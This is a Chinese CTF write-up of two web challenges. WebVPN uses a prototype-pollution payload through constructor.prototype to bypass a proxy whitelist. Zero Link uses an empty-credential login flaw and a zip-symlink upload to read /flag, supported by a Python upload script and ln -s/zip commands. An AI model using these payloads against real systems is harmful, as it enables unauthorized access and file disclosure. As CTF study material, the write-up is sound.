题目一、WebVPN
考点、原型链污染,__proto__过滤
题目描述、
开题:
app.js审计
登录的路由/user/login
app.post("/user/login", (req, res) => {
const { username, password } = req.body;
if (
typeof username != "string" ||
typeof password != "string" ||
!username ||
!password
) {
res.status(400);
res.end("invalid username or password");
return;
}
if (!userStorage[username]) {
res.status(403);
res.end("invalid username or password");
return;
}
if (userStorage[username].password !== password) {
res.status(403);
res.end("invalid username or password");
return;
}
req.session.username = username;
res.send("login su***ess");
});
一个登录的校验,由于密码账号都给了,没有什么悬念
路由/user/info
// under development
app.post("/user/info", (req, res) => {
if (!req.session.username) {
res.sendStatus(403);
}
update(userStorage[req.session.username].info, req.body);
res.sendStatus(200);
});
有一个update函数可以更新post方法传递的req.body,往上查找update函数
function update(dst, src) {
for (key in src) {
if (key.indexOf("__") != -1) {
continue;
}
if (typeof src[key] == "object" && dst[key] !== undefined) {
update(dst[key], src[key]);
continue;
}
dst[key] = src[key];
}
}
第一个if过滤了proto,第二个if就是明显的原型链污染。
相关连接:
Node.js 原型污染攻击的分析与利用 - 先知社区
深入理解JavaScript Prototype污染攻击 - FreeBuf网络安全行业门户
路由/proxy
检验url是否为合法的url,检测是否在strategy中的域名。
var userStorage = {
username: {
password: "password",
info: {
age: 18,
},
strategy: {
"baidu.***": true,
"google.***": false,
},
},
};
在题目所给的username的信息中只有baidu.***合法
// demo service behind webvpn
app.get("/flag", (req, res) => {
if (
req.headers.host != "127.0.0.1:3000" ||
req.hostname != "127.0.0.1" ||
req.ip != "127.0.0.1"
) {
res.sendStatus(400);
return;
}
const data = fs.readFileSync("/flag");
res.send(data);
});
用get请求访问/flag,要满足ip地址,主机名均为127.0.0.1而且Host要为127.0.0.1:3000
现在就是如何让127.0.0.1:3000变成一个合法的,没错,就是用原型链污染。
在/user/info中利用原型链污染
{
"constructor": {
"prototype": {
"127.0.0.1": true
}
}
}
下图是我不断试错的结果,均是失败的
最后成功带出
题目二、Zero Link
考点、文件上传软链接,登录的逻辑漏洞
题目描述
开题:
附件
在ZeroLink\src\internal\database下记录着用户和密码
在ZeroLink\src\internal\controller\user下审计,user.go
发现他的GetUserInfo函数很奇怪
他好像只判断token和username是否在数据库中,或者是否为Admin或者0000,却没有判断是否为空,将两者都设置为空
成功读取账号密码,个人猜测是因为,数据库中第一位就是admin所以默认读取了第一位的信息
登录后是文件上传,但是前端校验是
上网查,发现这个好像linux的火狐、mac电脑上的谷歌和火狐才会解析成这样,
个人电脑上解析成
因为这个是前端校验,bp抓不到包
审计代码ZeroLink\src\internal\controller\file
发现他其实是一个软链接,可以覆盖前面上传的文件,同时他有一个函数ReadSecretFile有点类似文件读取,但是要在secret上写文件的路径,发现原来是写/fake_flag,那么我们把secret文件改成/flag读取真正的文件。
我们用python上传
import requests
def upload_zip_file(file_path, upload_url):
try:
with open(file_path, 'rb') as file:
with requests.Session() as session:
# 设置会话的 Cookie
session.cookies['session'] = "MTcwODUxMDcxMnxEWDhFQVFMX2dBQUJFQUVRQUFBbl80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQWNBQlVGa2JXbHV8BTjAhJxSnL9bUmZqhBdCIPwZmoq1jmfwvFKm66qdlV0=" # 设置 session_id,替换为实际的 session_id
# 发送 POST 请求
files = {'file': ('file.zip', file, 'application/zip')}
response = session.post(upload_url, files=files)
if response.status_code == 200:
print("File uploaded su***essfully.")
print("Server response:", response.text)
else:
print(f"Failed to upload file. Status code: {response.status_code}")
print("Error message:", response.text)
except Exception as e:
print(f"An error o***urred: {e}")
def click(url):
with requests.Session() as session:
with requests.Session() as session:
# 设置会话的 Cookie
session.cookies['session'] = "MTcwODUyMzkzNnxEWDhFQVFMX2dBQUJFQUVRQUFBbl80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQWNBQlVGa2JXbHV86zgsTbR4_Gr9rYbNYRSdct6zteJTzcBVct0gz4oFDc0=" # 设置 session_id,替换为实际的 session_id
# 发送 GET 请求
response = session.get(url)
if response.status_code == 200:
print(response.text)
else:
print("erre",response.text)
if __name__ == "__main__":
file_path = './she1.zip' # 替换为要上传的 ZIP 文件的路径
upload_url = 'http://47.102.184.100:31488/api/upload' # 替换为接收上传的服务器端 URL
url='http://47.102.184.100:31488/api/unzip'
upload_zip_file(file_path,upload_url)
click(url)
kali软连接的步骤
//创建一个文件夹
mkdir app1
cd app1
//软链接
ln -s /app she
//压缩
zip --symlinks she.zip she
//删除she 软连接,创建app文件夹
rm -rf she
mkdir she
//返回上一级,因为secret处于与app1同级
mv secret app1/she
//secret的内容为/flag
//进入到app1文件夹
zip -r she1.zip ./she
//将she.zip和she1.zip拖到python脚本的同级目录
上传第一个
上传第二个
访问api/secret